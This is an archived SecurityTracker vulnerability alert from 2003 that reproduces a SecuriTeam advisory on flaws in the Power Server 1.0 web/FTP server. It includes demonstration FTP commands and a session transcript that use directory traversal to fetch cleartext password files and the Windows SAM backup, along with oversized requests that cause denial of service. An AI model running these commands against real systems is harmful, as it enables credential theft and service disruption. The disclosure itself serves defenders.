SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   Power Server Vendors:   HTML Helper
Power Server Discloses Passwords and Files to Remote Users
SecurityTracker Alert ID:  1007021
SecurityTracker URL:  http://securitytracker.com/id/1007021
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 19 2003
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   Several vulnerabilities were reported in Power Server. A remote user can view user passwords and files on the system and can introduce denial of service conditions.

Ziv Kamir reported that the FTP server stores usernames and passwords in clear text in the 'C:\Program Files\html-helper\Power Server\Addons\FTPUsers' directory. The password resides in a user-specific file in that directory. A local user can view the passwords (and, due to a directory traversal flaw described below, a remote authenticated FTP user can also view the passwords).

It is also reported that a remote authenticated user, including an anonymous user, can access the FTP service to view specified files located outside of the FTP root directory. Some demonstration exploit commands are provided:

ls "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/"

get "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/user1.ini"

get "C:/winnt/repair/sam._"

It is also reported that a remote user can send a large HTTP GET request to cause the server to consume a large amount of CPU resources. A demonstration exploit request is provided:

GET '///// [500,000 times]'

A remote user can also reportedly connect to the FTP service and send a USER or PASS argument that is 50,000 characters or longer to cause the server to consume a large amount of CPU resources. The report indicates that the CWD, LS, and MKDIR commands can also be exploited in this manner.
Impact:   A remote user can cause the server to consume a large amount of CPU resources.

A remote authenticated user, including an anonymous user, can view specified files on the system with the privileges of the FTP service. The user can view FTP account passwords.

A local user can view FTP account passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.html-helper.com/powerserver/default.asp (Links to External Site)
Cause:   Access control error, Input validation error, Resource error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  19 Jun 2003 18:17:00 +0200
Subject:  [NT] Multiple Vulnerabilities in Power Server


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security in Canada

Toronto-based Sunrays Technologies is now Beyond Security's representative in Canada.
We welcome ISPs, system integrators and IT systems resellers
to promote the most advanced vulnerability assessment solutions today.

Contact us at 416-482-0038 or at canadasales@beyondsecurity.com

- - - - - - - - -



  Multiple Vulnerabilities in Power Server
------------------------------------------------------------------------


SUMMARY

 <http://www.html-helper.com/powerserver/whatserver.asp> Power Server is 
"as you might have guessed a web server. But unlike most web servers, 
Power server is open source, comes with tons of options, and has a ton of 
features". Multiple vulnerabilities have been found in the product allow 
remote attackers to cause the server to no longer respond to legitimate 
requests, read any files that are stored locally, and grab the usernames 
and passwords stored under the server.

DETAILS

Vulnerable systems:
 * Power Server version 1.0

Denial of Service in HTTP server:
A remote user can issue an HTTP GET request for '///// [500,000 times]'. 
This will cause the server consume large amounts of CPU time (88% - 95%).

Clear text passwords:
The FTP server add-on stores all usernames and passwords under the folder: 
C:\Program Files\html-helper\Power Server\Addons\FTPUsers in clear text. 
Under this folder you can find a file for each of the user and inside the 
file their password.

Denial of Service in the FTP server:
A remote user can send a string of 50,000 characters or more as an 
argument of the USER or PASS command, and cause the target server to 
consume large amounts of CPU time (88% - 95%). 

A remote authenticated user can cause the server to consume large amounts 
of CPU time with the CWD, LS, and MKDIR commands in a very similar way.

Directory traversal in the FTP server:
A remote user with access to the FTP server, including anonymous access, 
can traverse into directories outside those bounded by the FTP root, and 
to download files by providing the complete path to the file (i.e. 
c:\boot.ini).

Examples:
> ftp 10.10.10.1
220 PowerServer FTP Server ready.
User (10.10.10.1:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls c:/ ==> To View The Contents Of c:\
ftp> ls "C:/Program Files/html-helper/Power Server/Addons/FTPUsers/" ==> 
To see a list of all the users under the FTP server
     200 Port command successful.
     150 Opening data connection for directory list.
     .
     ..
     Anonymous.ini
     user1.ini
     user2.ini
     .
     .
     .

ftp> get "C:/Program Files/html-helper/Power 
Server/Addons/FTPUsers/user1.ini" ==> Retreive the user's file with his 
password.

ftp> get "C:/winnt/repair/sam._" 


ADDITIONAL INFORMATION

The information has been provided by  <mailto:vulncode@yahoo.com> Ziv 
Kamir.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages.


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC